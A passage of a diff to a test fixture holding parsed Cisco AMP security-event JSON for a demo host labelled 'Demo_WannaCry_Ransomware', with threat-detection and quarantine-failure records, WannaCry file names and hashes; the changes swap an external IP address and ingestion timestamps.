Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3369,7 +3369,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3419,7 +3419,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3436,8 +3436,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103798946Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461709400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3459,7 +3459,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3505,7 +3505,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3522,8 +3522,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103800964Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461715100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3545,7 +3545,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3586,7 +3586,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3596,8 +3596,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103810465Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461720800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3617,7 +3617,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3662,7 +3662,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3672,8 +3672,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103812823Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461743900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3693,7 +3693,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3738,7 +3738,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3748,8 +3748,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103814854Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461750200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3769,7 +3769,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3814,7 +3814,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3824,8 +3824,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103817060Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461773300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3845,7 +3845,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3890,7 +3890,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3900,8 +3900,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103819277Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461779700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3921,7 +3921,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3982,7 +3982,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3999,8 +3999,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103825578Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461784300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"